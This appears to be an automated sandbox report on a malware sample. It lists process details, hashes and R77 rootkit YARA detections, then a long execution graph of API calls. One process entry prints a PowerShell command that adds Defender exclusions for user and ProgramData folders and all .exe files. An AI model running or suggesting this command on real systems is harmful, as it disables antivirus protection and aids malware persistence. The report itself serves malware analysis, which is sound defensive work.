                                                                  Start date:02/01/2025
                                                                  Path:C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
                                                                  Imagebase:0x7ff62dc40000
                                                                  File size:2'874'368 bytes
                                                                  MD5 hash:952F360A4651F948BE3A673178631641
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  Antivirus matches:
                                                                  • Detection: 92%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:67
                                                                  Start time:03:58:09
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:68
                                                                  Start time:03:58:09
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:11.1%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:30.5%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:27
                                                                    execution_graph 25360 7ff731ca2cec 25385 7ff731ca277c 25360->25385 25363 7ff731ca2e38 25484 7ff731ca30f0 7 API calls 2 library calls 25363->25484 25364 7ff731ca2d08 __scrt_acquire_startup_lock 25366 7ff731ca2e42 25364->25366 25369 7ff731ca2d26 25364->25369 25485 7ff731ca30f0 7 API calls 2 library calls 25366->25485 25368 7ff731ca2e4d abort 25371 7ff731ca2d4b 25369->25371 25375 7ff731ca2d68 __scrt_release_startup_lock 25369->25375 25393 7ff731cacd10 25369->25393 25372 7ff731ca2dd1 25397 7ff731ca323c 25372->25397 25374 7ff731ca2dd6 25400 7ff731cacca0 25374->25400 25375->25372 25481 7ff731cabfd0 35 API calls __GSHandlerCheck_EH 25375->25481 25486 7ff731ca2f30 25385->25486 25388 7ff731ca27a7 25388->25363 25388->25364 25389 7ff731ca27ab 25488 7ff731cacbd0 25389->25488 25394 7ff731cacd6b 25393->25394 25395 7ff731cacd4c 25393->25395 25394->25375 25395->25394 25505 7ff731c71120 25395->25505 25568 7ff731ca3c70 25397->25568 25570 7ff731cb06b0 25400->25570 25402 7ff731caccaf 25403 7ff731ca2dde 25402->25403 25574 7ff731cb0a40 35 API calls swprintf 25402->25574 25405 7ff731ca06d4 25403->25405 25576 7ff731c8df4c 25405->25576 25409 7ff731ca071a 25663 7ff731c993ec 25409->25663 25411 7ff731ca0724 memcpy_s 25668 7ff731c99994 25411->25668 25413 7ff731ca0d5c 25415 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25413->25415 25414 7ff731ca08ee GetCommandLineW 25416 7ff731ca0900 25414->25416 25417 7ff731ca0ac2 25414->25417 25419 7ff731ca0d62 25415->25419 25735 7ff731c7129c 25416->25735 25678 7ff731c86414 25417->25678 25418 7ff731ca0799 25418->25413 25418->25414 25730 7ff731ca7884 25419->25730 25422 7ff731ca0ad1 25426 7ff731c71fa0 31 API calls 25422->25426 25431 7ff731ca0ae8 BuildCatchObjectHelperInternal 25422->25431 25425 7ff731ca0925 25745 7ff731c9ca50 100 API calls 3 library calls 25425->25745 25426->25431 25428 7ff731ca0b13 SetEnvironmentVariableW GetLocalTime 25695 7ff731c83de8 25428->25695 25690 7ff731c71fa0 25431->25690 25434 7ff731ca092f 25434->25419 25437 7ff731ca0979 OpenFileMappingW 25434->25437 25438 7ff731ca0a5b 25434->25438 25440 7ff731ca0a50 CloseHandle 25437->25440 25441 7ff731ca0999 MapViewOfFile 25437->25441 25445 7ff731c7129c 33 API calls 25438->25445 25440->25417 25441->25440 25443 7ff731ca09bf UnmapViewOfFile MapViewOfFile 25441->25443 25443->25440 25446 7ff731ca09f1 25443->25446 25444 7ff731ca0bf5 25723 7ff731c96734 25444->25723 25449 7ff731ca0a80 25445->25449 25746 7ff731c9a110 33 API calls 2 library calls 25446->25746 25750 7ff731c9fc8c 35 API calls 2 library calls 25449->25750 25451 7ff731ca0a01 25747 7ff731c9fc8c 35 API calls 2 library calls 25451->25747 25453 7ff731ca0a8a 25453->25417 25459 7ff731ca0d57 25453->25459 25455 7ff731c96734 33 API calls 25457 7ff731ca0c07 DialogBoxParamW 25455->25457 25456 7ff731ca0a10 25748 7ff731c8b970 100 API calls 25456->25748 25464 7ff731ca0c53 25457->25464 25462 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25459->25462 25460 7ff731ca0a25 25749 7ff731c8babc 100 API calls 25460->25749 25462->25413 25463 7ff731ca0a38 25468 7ff731ca0a47 UnmapViewOfFile 25463->25468 25465 7ff731ca0c66 Sleep 25464->25465 25466 7ff731ca0c6c 25464->25466 25465->25466 25467 7ff731ca0c7a 25466->25467 25751 7ff731c99ecc 49 API calls 2 library calls 25466->25751 25470 7ff731ca0c86 DeleteObject 25467->25470 25468->25440 25471 7ff731ca0c9f DeleteObject 25470->25471 25472 7ff731ca0ca5 25470->25472 25471->25472 25473 7ff731ca0cdb 25472->25473 25477 7ff731ca0ced 25472->25477 25752 7ff731c9fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 25473->25752 25476 7ff731ca0ce0 CloseHandle 25476->25477 25726 7ff731c99464 25477->25726 25481->25372 25484->25366 25485->25368 25487 7ff731ca279e __scrt_dllmain_crt_thread_attach 25486->25487 25487->25388 25487->25389 25489 7ff731cb0ccc 25488->25489 25490 7ff731ca27b0 25489->25490 25493 7ff731caeb80 25489->25493 25490->25388 25492 7ff731ca5120 7 API calls 2 library calls 25490->25492 25492->25388 25504 7ff731caf318 EnterCriticalSection 25493->25504 25510 7ff731c791c8 25505->25510 25509 7ff731ca2981 25509->25395 25518 7ff731c85664 25510->25518 25512 7ff731c791df 25521 7ff731c8b744 25512->25521 25516 7ff731c71130 25517 7ff731ca293c 34 API calls 25516->25517 25517->25509 25527 7ff731c856a8 25518->25527 25536 7ff731c713a4 25521->25536 25524 7ff731c79a28 25525 7ff731c856a8 2 API calls 25524->25525 25526 7ff731c79a36 25525->25526 25526->25516 25528 7ff731c856be memcpy_s 25527->25528 25531 7ff731c8eb20 25528->25531 25534 7ff731c8ead4 GetCurrentProcess GetProcessAffinityMask 25531->25534 25535 7ff731c8569e 25534->25535 25535->25512 25537 7ff731c713ad 25536->25537 25538 7ff731c7142d 25536->25538 25539 7ff731c7143d 25537->25539 25540 7ff731c713ce 25537->25540 25538->25524 25556 7ff731c72018 33 API calls std::_Xinvalid_argument 25539->25556 25544 7ff731c713db memcpy_s 25540->25544 25546 7ff731ca2150 25540->25546 25555 7ff731c7197c 31 API calls _invalid_parameter_noinfo_noreturn 25544->25555 25547 7ff731ca215b 25546->25547 25548 7ff731ca2174 25547->25548 25550 7ff731ca217a 25547->25550 25557 7ff731cabb40 25547->25557 25548->25544 25551 7ff731ca2185 25550->25551 25560 7ff731ca2efc RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25550->25560 25561 7ff731c71f80 33 API calls 3 library calls 25551->25561 25554 7ff731ca218b 25555->25538 25562 7ff731cabb80 25557->25562 25560->25551 25561->25554 25567 7ff731caf318 EnterCriticalSection 25562->25567 25569 7ff731ca3253 GetStartupInfoW 25568->25569 25569->25374 25571 7ff731cb06c9 25570->25571 25572 7ff731cb06bd 25570->25572 25571->25402 25575 7ff731cb04f0 48 API calls 4 library calls 25572->25575 25574->25402 25575->25571 25753 7ff731ca23d0 25576->25753 25579 7ff731c8dfa2 GetProcAddress 25580 7ff731c8dfcf GetProcAddress 25579->25580 25581 7ff731c8dfb7 25579->25581 25583 7ff731c8dff7 25580->25583 25585 7ff731c8dfe4 25580->25585 25581->25580 25582 7ff731c8e47f 25584 7ff731c86414 34 API calls 25582->25584 25583->25582 25795 7ff731cab708 39 API calls _snwprintf 25583->25795 25587 7ff731c8e488 25584->25587 25585->25583 25755 7ff731c87db4 25587->25755 25588 7ff731c8e32c 25588->25582 25589 7ff731c8e336 25588->25589 25591 7ff731c86414 34 API calls 25589->25591 25592 7ff731c8e33f CreateFileW 25591->25592 25593 7ff731c8e37f SetFilePointer 25592->25593 25594 7ff731c8e46c CloseHandle 25592->25594 25593->25594 25596 7ff731c8e398 ReadFile 25593->25596 25597 7ff731c71fa0 31 API calls 25594->25597 25596->25594 25598 7ff731c8e3c0 25596->25598 25597->25582 25599 7ff731c8e3d4 25598->25599 25600 7ff731c8e77c 25598->25600 25605 7ff731c7129c 33 API calls 25599->25605 25808 7ff731ca25a4 8 API calls 25600->25808 25602 7ff731c8e4ba CompareStringW 25620 7ff731c8e496 25602->25620 25603 7ff731c7129c 33 API calls 25603->25620 25604 7ff731c8e781 25612 7ff731c8e40b 25605->25612 25607 7ff731c8e5b6 25610 7ff731c8e5c4 25607->25610 25611 7ff731c8e73e 25607->25611 25608 7ff731c71fa0 31 API calls 25608->25620 25797 7ff731c87e70 47 API calls 25610->25797 25615 7ff731c71fa0 31 API calls 25611->25615 25613 7ff731c8e457 25612->25613 25796 7ff731c8d05c 33 API calls 25612->25796 25617 7ff731c71fa0 31 API calls 25613->25617 25619 7ff731c8e747 25615->25619 25621 7ff731c8e461 25617->25621 25618 7ff731c8e5cd 25622 7ff731c85164 9 API calls 25618->25622 25624 7ff731c71fa0 31 API calls 25619->25624 25620->25602 25620->25603 25620->25608 25638 7ff731c8e548 25620->25638 25763 7ff731c85164 25620->25763 25768 7ff731c88050 25620->25768 25772 7ff731c8327c 25620->25772 25625 7ff731c71fa0 31 API calls 25621->25625 25626 7ff731c8e5d2 25622->25626 25623 7ff731c7129c 33 API calls 25623->25638 25627 7ff731c8e751 25624->25627 25625->25594 25628 7ff731c8e682 25626->25628 25635 7ff731c8e5dd 25626->25635 25786 7ff731ca22a0 25627->25786 25631 7ff731c8da14 48 API calls 25628->25631 25629 7ff731c88050 47 API calls 25629->25638 25633 7ff731c8e6c7 AllocConsole 25631->25633 25636 7ff731c8e6d1 GetCurrentProcessId AttachConsole 25633->25636 25637 7ff731c8e677 25633->25637 25634 7ff731c71fa0 31 API calls 25634->25638 25798 7ff731c8aaa0 25635->25798 25639 7ff731c8e6e8 25636->25639 25807 7ff731c719e0 31 API calls _invalid_parameter_noinfo_noreturn 25637->25807 25638->25607 25638->25623 25638->25629 25638->25634 25640 7ff731c8327c 51 API calls 25638->25640 25646 7ff731c8e6f4 GetStdHandle WriteConsoleW Sleep FreeConsole 25639->25646 25640->25638 25643 7ff731c8e735 ExitProcess 25644 7ff731c8e621 25802 7ff731c8da14 25644->25802 25646->25637 25648 7ff731c8aaa0 46 API calls 25649 7ff731c8e64a 25648->25649 25805 7ff731c8dba8 33 API calls 25649->25805 25651 7ff731c8e656 25806 7ff731c719e0 31 API calls _invalid_parameter_noinfo_noreturn 25651->25806 25653 7ff731c8629c GetCurrentDirectoryW 25654 7ff731c862c0 25653->25654 25659 7ff731c8634d 25653->25659 25655 7ff731c713a4 33 API calls 25654->25655 25656 7ff731c862db GetCurrentDirectoryW 25655->25656 25657 7ff731c86301 25656->25657 26025 7ff731c720b0 25657->26025 25659->25409 25660 7ff731c8630f 25660->25659 25661 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25660->25661 25662 7ff731c86369 25661->25662 25664 7ff731c8dd04 25663->25664 25665 7ff731c99401 OleInitialize 25664->25665 25666 7ff731c99427 25665->25666 25667 7ff731c9944d SHGetMalloc 25666->25667 25667->25411 25669 7ff731c999c9 25668->25669 25671 7ff731c999ce BuildCatchObjectHelperInternal 25668->25671 25670 7ff731c71fa0 31 API calls 25669->25670 25670->25671 25672 7ff731c71fa0 31 API calls 25671->25672 25674 7ff731c999fd BuildCatchObjectHelperInternal 25671->25674 25672->25674 25673 7ff731c71fa0 31 API calls 25675 7ff731c99a2c BuildCatchObjectHelperInternal 25673->25675 25674->25673 25674->25675 25676 7ff731c71fa0 31 API calls 25675->25676 25677 7ff731c99a5b BuildCatchObjectHelperInternal 25675->25677 25676->25677 25677->25418 25679 7ff731c713a4 33 API calls 25678->25679 25680 7ff731c86449 25679->25680 25681 7ff731c8644c GetModuleFileNameW 25680->25681 25684 7ff731c8649c 25680->25684 25682 7ff731c8649e 25681->25682 25683 7ff731c86467 25681->25683 25682->25684 25683->25680 25685 7ff731c7129c 33 API calls 25684->25685 25687 7ff731c864c6 25685->25687 25686 7ff731c864fe 25686->25422 25687->25686 25688 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25687->25688 25689 7ff731c86520 25688->25689 25691 7ff731c71fb3 25690->25691 25692 7ff731c71fdc 25690->25692 25691->25692 25693 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25691->25693 25692->25428 25694 7ff731c72000 25693->25694 25696 7ff731c83e0d _snwprintf 25695->25696 25697 7ff731ca9e70 swprintf 46 API calls 25696->25697 25698 7ff731c83e29 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25697->25698 25699 7ff731c9af94 LoadBitmapW 25698->25699 25700 7ff731c9afbe 25699->25700 25704 7ff731c9afc6 25699->25704 26030 7ff731c985a4 FindResourceW 25700->26030 25702 7ff731c9afce GetObjectW 25703 7ff731c9afe3 25702->25703 26045 7ff731c9841c 25703->26045 25704->25702 25704->25703 25707 7ff731c9b04e 25718 7ff731c8986c 25707->25718 25708 7ff731c9b01e 26050 7ff731c98484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25708->26050 25709 7ff731c985a4 11 API calls 25711 7ff731c9b00a 25709->25711 25711->25708 25713 7ff731c9b012 DeleteObject 25711->25713 25712 7ff731c9b027 26051 7ff731c9844c 25712->26051 25713->25708 25717 7ff731c9b03f DeleteObject 25717->25707 26058 7ff731c8989c 25718->26058 25720 7ff731c8987a 26125 7ff731c8a3fc GetModuleHandleW FindResourceW 25720->26125 25722 7ff731c89882 25722->25444 25724 7ff731ca2150 33 API calls 25723->25724 25725 7ff731c9677a 25724->25725 25725->25455 25727 7ff731c99481 25726->25727 25728 7ff731c9948a OleUninitialize 25727->25728 25729 7ff731cde330 25728->25729 26214 7ff731ca77bc 31 API calls 3 library calls 25730->26214 25732 7ff731ca789d 26215 7ff731ca78b4 16 API calls abort 25732->26215 25737 7ff731c712d0 25735->25737 25742 7ff731c7139b 25735->25742 25739 7ff731c71338 25737->25739 25740 7ff731c71396 25737->25740 25743 7ff731c712de BuildCatchObjectHelperInternal 25737->25743 25739->25743 25744 7ff731ca2150 33 API calls 25739->25744 26216 7ff731c71f80 33 API calls 3 library calls 25740->26216 26217 7ff731c72004 33 API calls std::_Xinvalid_argument 25742->26217 25743->25425 25744->25743 25745->25434 25746->25451 25747->25456 25748->25460 25749->25463 25750->25453 25751->25467 25752->25476 25754 7ff731c8df70 GetModuleHandleW 25753->25754 25754->25579 25754->25583 25756 7ff731c87dcc 25755->25756 25757 7ff731c87e15 25756->25757 25758 7ff731c87de3 25756->25758 25809 7ff731c7704c 47 API calls BuildCatchObjectHelperInternal 25757->25809 25760 7ff731c7129c 33 API calls 25758->25760 25762 7ff731c87e07 25760->25762 25761 7ff731c87e1a 25762->25620 25764 7ff731c851bb 25763->25764 25765 7ff731c85188 GetVersionExW 25763->25765 25766 7ff731ca22a0 _handle_error 8 API calls 25764->25766 25765->25764 25767 7ff731c851e8 25766->25767 25767->25620 25769 7ff731c88065 25768->25769 25810 7ff731c88148 25769->25810 25771 7ff731c8808a 25771->25620 25773 7ff731c832a7 GetFileAttributesW 25772->25773 25774 7ff731c832a4 25772->25774 25775 7ff731c832b8 25773->25775 25782 7ff731c83335 25773->25782 25774->25773 25819 7ff731c869cc 25775->25819 25776 7ff731ca22a0 _handle_error 8 API calls 25778 7ff731c83349 25776->25778 25778->25620 25780 7ff731c832fc 25780->25782 25783 7ff731c83359 25780->25783 25781 7ff731c832e3 GetFileAttributesW 25781->25780 25782->25776 25784 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25783->25784 25785 7ff731c8335e 25784->25785 25787 7ff731ca22a9 25786->25787 25788 7ff731c8e760 25787->25788 25789 7ff731ca24d0 IsProcessorFeaturePresent 25787->25789 25788->25653 25790 7ff731ca24e8 25789->25790 25924 7ff731ca26c4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25790->25924 25792 7ff731ca24fb 25925 7ff731ca2490 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25792->25925 25795->25588 25796->25612 25797->25618 25799 7ff731c8aab3 25798->25799 25926 7ff731c89734 25799->25926 25801 7ff731c8ab14 25801->25644 25952 7ff731c8d7f0 25802->25952 25805->25651 25806->25637 25807->25643 25808->25604 25809->25761 25811 7ff731c882e6 25810->25811 25814 7ff731c8817a 25810->25814 25818 7ff731c7704c 47 API calls BuildCatchObjectHelperInternal 25811->25818 25813 7ff731c882eb 25816 7ff731c88194 BuildCatchObjectHelperInternal 25814->25816 25817 7ff731c85864 33 API calls 2 library calls 25814->25817 25816->25771 25817->25816 25818->25813 25820 7ff731c86a0b 25819->25820 25837 7ff731c86a04 25819->25837 25822 7ff731c7129c 33 API calls 25820->25822 25821 7ff731ca22a0 _handle_error 8 API calls 25823 7ff731c832df 25821->25823 25824 7ff731c86a36 25822->25824 25823->25780 25823->25781 25825 7ff731c86c87 25824->25825 25826 7ff731c86a56 25824->25826 25827 7ff731c8629c 35 API calls 25825->25827 25828 7ff731c86a70 25826->25828 25850 7ff731c86b09 25826->25850 25830 7ff731c86ca6 25827->25830 25829 7ff731c8706b 25828->25829 25892 7ff731c7c0a8 33 API calls 2 library calls 25828->25892 25916 7ff731c72004 33 API calls std::_Xinvalid_argument 25829->25916 25831 7ff731c86eaf 25830->25831 25834 7ff731c86cdb 25830->25834 25889 7ff731c86b04 25830->25889 25833 7ff731c8708f 25831->25833 25913 7ff731c7c0a8 33 API calls 2 library calls 25831->25913 25919 7ff731c72004 33 API calls std::_Xinvalid_argument 25833->25919 25840 7ff731c8707d 25834->25840 25895 7ff731c7c0a8 33 API calls 2 library calls 25834->25895 25835 7ff731c87071 25848 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25835->25848 25837->25821 25838 7ff731c86ac3 25851 7ff731c71fa0 31 API calls 25838->25851 25858 7ff731c86ad5 BuildCatchObjectHelperInternal 25838->25858 25917 7ff731c72004 33 API calls std::_Xinvalid_argument 25840->25917 25841 7ff731c87095 25843 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25841->25843 25849 7ff731c8709b 25843->25849 25844 7ff731c87066 25855 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25844->25855 25845 7ff731c86f16 25914 7ff731c711cc 33 API calls BuildCatchObjectHelperInternal 25845->25914 25856 7ff731c87077 25848->25856 25862 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25849->25862 25857 7ff731c7129c 33 API calls 25850->25857 25850->25889 25851->25858 25853 7ff731c87083 25865 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25853->25865 25854 7ff731c71fa0 31 API calls 25854->25889 25855->25829 25860 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25856->25860 25863 7ff731c86b7e 25857->25863 25858->25854 25859 7ff731c86f29 25915 7ff731c8576c 33 API calls BuildCatchObjectHelperInternal 25859->25915 25860->25840 25861 7ff731c71fa0 31 API calls 25875 7ff731c86db5 25861->25875 25866 7ff731c870a1 25862->25866 25893 7ff731c857e0 33 API calls 25863->25893 25868 7ff731c87089 25865->25868 25918 7ff731c7704c 47 API calls BuildCatchObjectHelperInternal 25868->25918 25869 7ff731c86d36 BuildCatchObjectHelperInternal 25869->25853 25869->25861 25870 7ff731c86b93 25894 7ff731c7e174 33 API calls 2 library calls 25870->25894 25871 7ff731c71fa0 31 API calls 25874 7ff731c86fac 25871->25874 25877 7ff731c71fa0 31 API calls 25874->25877 25880 7ff731c86de1 25875->25880 25896 7ff731c71744 25875->25896 25876 7ff731c86f39 BuildCatchObjectHelperInternal 25876->25849 25876->25871 25879 7ff731c86fb6 25877->25879 25878 7ff731c71fa0 31 API calls 25882 7ff731c86c2d 25878->25882 25883 7ff731c71fa0 31 API calls 25879->25883 25880->25868 25884 7ff731c7129c 33 API calls 25880->25884 25885 7ff731c71fa0 31 API calls 25882->25885 25883->25889 25886 7ff731c86e82 25884->25886 25885->25889 25909 7ff731c72034 25886->25909 25887 7ff731c86ba9 BuildCatchObjectHelperInternal 25887->25856 25887->25878 25889->25835 25889->25837 25889->25841 25889->25844 25890 7ff731c86e9f 25891 7ff731c71fa0 31 API calls 25890->25891 25891->25889 25892->25838 25893->25870 25894->25887 25895->25869 25897 7ff731c718a1 25896->25897 25900 7ff731c71784 25896->25900 25920 7ff731c72004 33 API calls std::_Xinvalid_argument 25897->25920 25899 7ff731c718a7 25921 7ff731c71f80 33 API calls 3 library calls 25899->25921 25900->25899 25904 7ff731ca2150 33 API calls 25900->25904 25907 7ff731c717ac BuildCatchObjectHelperInternal 25900->25907 25902 7ff731c718ad 25922 7ff731ca34cc 31 API calls __std_exception_copy 25902->25922 25904->25907 25905 7ff731c718d9 25905->25880 25906 7ff731c71859 BuildCatchObjectHelperInternal 25906->25880 25907->25906 25908 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25907->25908 25908->25897 25910 7ff731c72085 25909->25910 25912 7ff731c72059 BuildCatchObjectHelperInternal 25909->25912 25923 7ff731c715b8 33 API calls 3 library calls 25910->25923 25912->25890 25913->25845 25914->25859 25915->25876 25918->25833 25921->25902 25922->25905 25923->25912 25924->25792 25933 7ff731c895f8 25926->25933 25929 7ff731c89799 25931 7ff731ca22a0 _handle_error 8 API calls 25929->25931 25932 7ff731c897b2 25931->25932 25932->25801 25934 7ff731c89652 25933->25934 25942 7ff731c896f0 25933->25942 25938 7ff731c89680 25934->25938 25947 7ff731c90ee8 WideCharToMultiByte 25934->25947 25935 7ff731ca22a0 _handle_error 8 API calls 25937 7ff731c89724 25935->25937 25937->25929 25943 7ff731c897c0 25937->25943 25941 7ff731c896af 25938->25941 25949 7ff731c8aa48 45 API calls _snwprintf 25938->25949 25950 7ff731caa1f0 31 API calls 2 library calls 25941->25950 25942->25935 25944 7ff731c89800 25943->25944 25945 7ff731c89829 25943->25945 25951 7ff731caa1f0 31 API calls 2 library calls 25944->25951 25945->25929 25948 7ff731c90f2a 25947->25948 25948->25938 25949->25941 25950->25942 25951->25945 25968 7ff731c8d44c 25952->25968 25957 7ff731c8d861 _snwprintf 25963 7ff731c8d8f0 25957->25963 25982 7ff731ca9e70 25957->25982 26009 7ff731c79d78 33 API calls 25957->26009 25959 7ff731c8d993 25960 7ff731ca22a0 _handle_error 8 API calls 25959->25960 25961 7ff731c8d9a7 25960->25961 25961->25648 25962 7ff731c8d9bb 25964 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 25962->25964 25965 7ff731c8d91f 25963->25965 26010 7ff731c79d78 33 API calls 25963->26010 25966 7ff731c8d9c0 25964->25966 25965->25959 25965->25962 25969 7ff731c8d5e1 25968->25969 25970 7ff731c8d47e 25968->25970 25972 7ff731c8cb3c 25969->25972 25970->25969 25971 7ff731c71744 33 API calls 25970->25971 25971->25970 25973 7ff731c8cc3c 25972->25973 25974 7ff731c8cb72 25972->25974 26012 7ff731c72004 33 API calls std::_Xinvalid_argument 25973->26012 25977 7ff731c8cc37 25974->25977 25978 7ff731c8cbdc 25974->25978 25980 7ff731c8cb82 25974->25980 26011 7ff731c71f80 33 API calls 3 library calls 25977->26011 25978->25980 25981 7ff731ca2150 33 API calls 25978->25981 25980->25957 25981->25980 25983 7ff731ca9eb6 25982->25983 25984 7ff731ca9ece 25982->25984 26013 7ff731cad61c 15 API calls abort 25983->26013 25984->25983 25985 7ff731ca9ed8 25984->25985 26015 7ff731ca7e70 35 API calls 2 library calls 25985->26015 25988 7ff731ca9ebb 26014 7ff731ca7864 31 API calls _invalid_parameter_noinfo 25988->26014 25990 7ff731ca22a0 _handle_error 8 API calls 25992 7ff731caa08b 25990->25992 25991 7ff731ca9ee9 memcpy_s 26016 7ff731ca7df0 15 API calls memcpy_s 25991->26016 25992->25957 25994 7ff731ca9f54 26017 7ff731ca8278 46 API calls 3 library calls 25994->26017 25996 7ff731ca9f5d 25997 7ff731ca9f65 25996->25997 25998 7ff731ca9f94 25996->25998 26018 7ff731cad88c 25997->26018 26000 7ff731caa012 25998->26000 26001 7ff731ca9fa3 25998->26001 26002 7ff731ca9fec 25998->26002 26003 7ff731ca9f9a 25998->26003 26000->26002 26004 7ff731caa01c 26000->26004 26005 7ff731cad88c __free_lconv_mon 15 API calls 26001->26005 26006 7ff731cad88c __free_lconv_mon 15 API calls 26002->26006 26003->26001 26003->26002 26007 7ff731cad88c __free_lconv_mon 15 API calls 26004->26007 26008 7ff731ca9ec6 26005->26008 26006->26008 26007->26008 26008->25990 26009->25957 26010->25965 26011->25973 26013->25988 26014->26008 26015->25991 26016->25994 26017->25996 26019 7ff731cad891 RtlFreeHeap 26018->26019 26023 7ff731cad8c1 __free_lconv_mon 26018->26023 26020 7ff731cad8ac 26019->26020 26019->26023 26024 7ff731cad61c 15 API calls abort 26020->26024 26022 7ff731cad8b1 GetLastError 26022->26023 26023->26008 26024->26022 26026 7ff731c720f6 26025->26026 26028 7ff731c720cb BuildCatchObjectHelperInternal 26025->26028 26029 7ff731c71474 33 API calls 3 library calls 26026->26029 26028->25660 26029->26028 26031 7ff731c985cf SizeofResource 26030->26031 26032 7ff731c9871b 26030->26032 26031->26032 26033 7ff731c985e9 LoadResource 26031->26033 26032->25704 26033->26032 26034 7ff731c98602 LockResource 26033->26034 26034->26032 26035 7ff731c98617 GlobalAlloc 26034->26035 26035->26032 26036 7ff731c98638 GlobalLock 26035->26036 26037 7ff731c98712 GlobalFree 26036->26037 26038 7ff731c9864a BuildCatchObjectHelperInternal 26036->26038 26037->26032 26039 7ff731c98658 CreateStreamOnHGlobal 26038->26039 26040 7ff731c98676 GdipAlloc 26039->26040 26041 7ff731c98709 GlobalUnlock 26039->26041 26042 7ff731c9868b 26040->26042 26041->26037 26042->26041 26043 7ff731c986f2 26042->26043 26044 7ff731c986da GdipCreateHBITMAPFromBitmap 26042->26044 26043->26041 26044->26043 26046 7ff731c9844c 4 API calls 26045->26046 26047 7ff731c9842a 26046->26047 26048 7ff731c98439 26047->26048 26056 7ff731c98484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26047->26056 26048->25707 26048->25708 26048->25709 26050->25712 26052 7ff731c98463 26051->26052 26053 7ff731c9845e 26051->26053 26055 7ff731c98d74 16 API calls _handle_error 26052->26055 26057 7ff731c98510 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26053->26057 26055->25717 26056->26048 26057->26052 26061 7ff731c898be _snwprintf 26058->26061 26059 7ff731c89933 26179 7ff731c86870 48 API calls 26059->26179 26061->26059 26062 7ff731c89a49 26061->26062 26065 7ff731c899bd 26062->26065 26067 7ff731c720b0 33 API calls 26062->26067 26063 7ff731c71fa0 31 API calls 26063->26065 26064 7ff731c8993d BuildCatchObjectHelperInternal 26064->26063 26066 7ff731c8a3ee 26064->26066 26127 7ff731c82480 26065->26127 26068 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26066->26068 26067->26065 26070 7ff731c8a3f4 26068->26070 26072 7ff731ca7884 